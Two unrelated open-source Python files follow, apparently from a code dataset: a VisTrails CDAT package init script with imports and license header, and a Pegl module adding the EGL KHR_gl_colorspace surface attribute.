## This file may be used under the terms of the GNU General Public
## License version 2.0 as published by the Free Software Foundation
## and appearing in the file LICENSE.GPL included in the packaging of
## this file. Please review the following to ensure GNU General Public
## Licensing requirements will be met:
## http://www.opensource.org/licenses/gpl-license.php
##
## If you are unsure which license is appropriate for your use (for
## instance, you are interested in developing a commercial derivative
## of VisTrails), please contact us at contact@vistrails.org.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
############################################################################
""" Do not edit this file!
File automatically generated by scripts/gen_init.py
Change History:
version : description
0.2 : Integrated quickplot module that displays the CDAT plot
widget inside the spreadsheet
0.1 : First automatically generated package based on xml descriptions
"""
from PyQt4 import QtCore, QtGui
import sip
import core.modules
import core.modules.module_registry
from core.modules.vistrails_module import (Module, NotCacheable,
ModuleError, new_module)
from core.bundles import py_import
import os, sys
#cdat specific packages
vcs = py_import('vcs',{})
cdms2 = py_import('cdms2', {})
cdutil = py_import('cdutil', {})
#local python modules
from cdat_window import QCDATWindow
from cdat_cell import QCDATWidget
from quickplot import quickplot | Nikea/VisTrails | contrib/cdat/scripts/init_inc.py | Python | bsd-3-clause | 1,823 |
#!/usr/bin/env python3
'''Khronos OpenGL colorspace extension for EGL.
This extension allows OpenGL and OpenGL ES surfaces to use the sRGB
and linear colorspaces that are already available to OpenVG.
http://www.khronos.org/registry/egl/extensions/KHR/EGL_KHR_gl_colorspace.txt
'''
# Copyright © 2014 Tim Pederick.
#
# This file is part of Pegl.
#
# Pegl is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pegl is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pegl. If not, see <http://www.gnu.org/licenses/>.
# Standard library imports.
from collections import namedtuple
# Local imports.
from ..surface import Surface
from ..attribs.surface import SurfaceAttribs
# New surface attributes.
GLColorSpaces = namedtuple('GLColorSpaces_tuple',
('SRGB', 'LINEAR')
)(0x3089, 0x308A)
SurfaceAttribs.extend('GL_COLORSPACE', 0x309D, GLColorSpaces,
GLColorSpaces.LINEAR)
# New Surface property for querying the new attribute.
def opengl_colorspace(self):
'''Get the OpenGL/OpenGL ES colorspace in use on this surface.'''
return self._attr(SurfaceAttribs.GL_COLORSPACE)
Surface.opengl_colorspace = property(opengl_colorspace)
| perey/pegl | src/pegl/ext/khr_glcolor.py | Python | gpl-3.0 | 1,654 |